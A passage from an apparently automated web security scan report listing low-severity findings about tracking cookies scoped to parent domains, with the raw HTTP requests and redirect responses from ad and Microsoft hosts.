Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Connection: close
Content-Length: 2204

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

16.46. http://c.redcated/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.redcated
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&RedC=c.redacted&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redcated
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.redacted/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.redacted%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&MUID=AD04D6F8B2FF44629973BD0674351135
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;
Date: Sat, 29 Jan 2011 23:26:33 GMT
Content-Length: 0


16.47. http://c.bing.com/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/results.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621031&D=1593447&AF=NOFORM; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.redcated/c.gif?DI=15074&RedC=c.bing.com&MXFR=F741A5D3C8544F77A0B57D8439E7E06E
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; domain=.bing.com; expires=Thu, 18-Aug-2011 17:11:11 GMT; path=/;
Date: Sun, 30 Jan 2011 17:11:10 GMT
Content-Length: 0


16.48. http://c.redacted/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.redacted
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 23:26:33 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; domain=.redacted; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;
Connection: Keep-Alive
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Location: http://c.redcated/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.redacted%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&RedC=c.redacted&MXFR=AD04D6F8B2FF44629973BD0674351135


16.49. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1890207&resolution=1920&h=1200&camefrom=http%3A//news.ycombinator.com/news&u=http%3A//informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual&t=Information%20Arbitrage%20-%20Start%20Fund%3A%20No%20big%20deal.%20Business%20as%20usual.&java=1&security=9e00f8ff&sc_random=0.31911576888523996&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:47:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0; expires=Fri, 29-Jan-2016 14:47:53 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

16.50. http://calendar.live.com/calendar/calendar.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calendar.live.com
Path:   /calendar/calendar.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /calendar/calendar.aspx HTTP/1.1
Host: calendar.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
xxn:23
X-AspNet-Version: 2.0.50727
x-dns-prefetch-control: off
X-UA-Compatible: IE=7
X-Content-Type-Options: nosniff
MSNSERVER: H: cal1-w23 V: 15.4.120.117 D: 2011-01-18T01:29:02
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353171&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fcalendar.live.com%2F%2Fcalendar%2Fcalendar.aspx&lc=1033&id=64362&mkt=en-us
Set-Cookie: mktstate=S=-1659053062&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=ui=en-us; domain=.calendar.live.com; path=/
Set-Cookie: mt=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: WLC=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: PSC=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: CCN=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sun, 06-Feb-2011 02:06:11 GMT; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 334

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353171&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wrep
...[SNIP]...

16.51. http://careers.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://careers.redacted
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: careers.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 30 Jan 2011 02:06:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
Set-Cookie: MC1=V=3&GUID=da39980442014ca6b9da39619943b989; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8EDD00D637154D4B841C122EB598FF5B; domain=.redacted; expires=Thu, 18-Aug-2011 02:06:11 GMT; path=/
Cache-Control: no-cache
Content-Length: 0


16.52. http://clk.redcated/APM/go/139941180/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /APM/go/139941180/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /APM/go/139941180/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.meaningfulbeauty.com/?uci=US-MT-O-DI-MI-2906
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353263-3972457; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=7E5205F6A748400B84AD01F34006AE37; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/285d4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=b882065/285d4/10e4d581/bab9/4d44c7ef; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:43 GMT
Connection: close


16.53. http://clk.redcated/APM/go/148848786/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /APM/go/148848786/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /APM/go/148848786/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=DA936173-6614-470C-8AAF-8DD52E3643E8
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353265-3982025; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=5DEF820424F84B24B69D3D93ECECB25F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bce8f84/1a43a/11174245/bab9/4d44c7f1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:45 GMT
Connection: close


16.54. http://clk.redcated/BEL/go/262582811/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /BEL/go/262582811/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BEL/go/262582811/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353269-3932791; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=CE711711131C4C8D81F8D0F57B52D165; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7f5; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:48 GMT
Connection: close


16.55. http://clk.redcated/CNT/go/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /CNT/go/286609711/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/286609711/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353204-3934536; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=B03CF75FE18B4C4488D98A18A160243C; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7b4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:43 GMT
Connection: close


16.56. http://clk.redcated/CNT/go/287065754/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /CNT/go/287065754/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/287065754/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353207-3943143; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=3467FF0EC8A04BA6ADED05C9CB0F7837; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7b7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:46 GMT
Connection: close


16.57. http://clk.redcated/CNT/go/299297287/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /CNT/go/299297287/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/299297287/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344744-9189356; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=ADE9FC21333E46488D7A7ABFE892B219; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a8; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:43 GMT
Connection: close


16.58. http://clk.redcated/NFX/go/297941249/direct/01/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /NFX/go/297941249/direct/01/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NFX/go/297941249/direct/01/ HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.netflix.com/opdply?mqso=80028841
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344741-9183539; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=911C5A9886C74D1D85E6D49FC8A33620; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c4e; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf3b0a8/1c4e/11c23901/bab9/4d44a6a5; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:40 GMT
Connection: close


16.59. http://clk.redcated/ULA/go/296652509/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /ULA/go/296652509/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ULA/go/296652509/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296350513-3979227; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=27C92A747D6B4A87B8366284DD8E4677; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:53 GMT
Connection: close


16.60. http://clk.redcated/go/286026710/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /go/286026710/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/286026710/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.ishares.com/home.htm&c=MSN
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296350513-3980097; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=2652D8E3C448492EBAA5519D4E847438; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=4bd5098/1c5b3/110c6bd6/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:53 GMT
Connection: close


16.61. http://clk.redcated/go/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /go/286609711/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/286609711/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353255-3938625; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=9B933D979CFB4CC081B176EF97E8AAD9; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7e7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:35 GMT
Connection: close


16.62. http://clk.redcated/go/287065754/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /go/287065754/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/287065754/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353257-3947053; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=CDB74D90C77343EFBA0AEB977000E321; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7e9; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:36 GMT
Connection: close


16.63. http://clk.redcated/go/296652509/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /go/296652509/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/296652509/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
